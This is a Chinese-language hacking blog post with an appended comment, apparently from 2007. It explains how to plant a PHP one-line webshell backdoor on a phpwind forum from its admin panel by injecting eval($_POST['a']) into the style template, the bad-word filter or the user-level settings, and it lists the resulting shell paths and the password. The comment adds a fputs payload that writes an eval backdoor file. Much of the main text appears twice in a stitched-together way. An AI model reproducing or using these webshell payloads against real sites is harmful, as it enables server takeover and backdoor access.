2007-04-08 08:13:21 by: h4x0r
phpwind 从后台拿webshell的三种方式
进入后台, 风格模版设置 ,在随便一行写代码
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<
例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST[’a’]);
print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}
而后得到一个shell
http://localhost/bbs/index.php
(由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的)
密码是a lanker的一句话后门。
方式2 脏话过滤法
进入安全管理 ◇ 不良词语过滤
新增
不良词语写 a’]=’aa’;eval($_POST[’a’]);//
替换为那里可以随意写
而后得到一个shell地址为
http://localhost/bbs/data/bbscache/wordsfb.php
密码是a lanker的一句话后门。
方式3 用户等级管理
然后新建立会员组
头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a’;eval($_POST[’a’]);//
升级点数依然可以随意写。
而后得到一个shell地址为
http://localhost/bbs/data/bbscache/level.php
密码是a lanker的一句话后门。
这里提供的方式随便你选一种都可以得到shell。。。
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=852
记住,这代码必须顶着左边行写,代码前面不可以有任何字符。
EOT;
eval($a);
print <<
例如,我写完某一行为。
.headurl { color:#ffffff;}
EOT;
eval($_POST[’a’]);
print <<.index_font{color: #3A4F6C;background-color:#EBEBEB; font-weight:bold;padding: 5px;}
而后得到一个shell
http://localhost/bbs/index.php
(由于写到css里,也许有的操作无法返回,但是只要没有什么问题,一般操作都是可以接受的)
密码是a lanker的一句话后门。
方式2 脏话过滤法
进入安全管理 ◇ 不良词语过滤
新增
不良词语写 a’]=’aa’;eval($_POST[’a’]);//
替换为那里可以随意写
而后得到一个shell地址为
http://localhost/bbs/data/bbscache/wordsfb.php
密码是a lanker的一句话后门。
方式3 用户等级管理
然后新建立会员组
头衔你可以随便写,但是千万不要写单双引号特殊符号,升级图片号写a’;eval($_POST[’a’]);//
升级点数依然可以随意写。
而后得到一个shell地址为
http://localhost/bbs/data/bbscache/level.php
密码是a lanker的一句话后门。
这里提供的方式随便你选一种都可以得到shell。。。
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=852









此三种方式不可行。。。
下面是9xiao 的方法:
如果是winnt系统直接添加一个.asa后缀的文件,(dz可以直接传asa)在后台找到文件上传的后的文件名,论坛发个phpshell,<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>然后看图修改包含银行查件文件名bank.php为上传的phpshell的相对路径,访问url://hack.php?H_name=bank,就会在论坛根目录生成一个a.php的最小马。还有不用上传就是在词语替换那<?fputs(fopen("./a.php","w"),"<?eval(\$_POST[a]);?>")?>插入,然后备份wordsfb字段记下相对路径。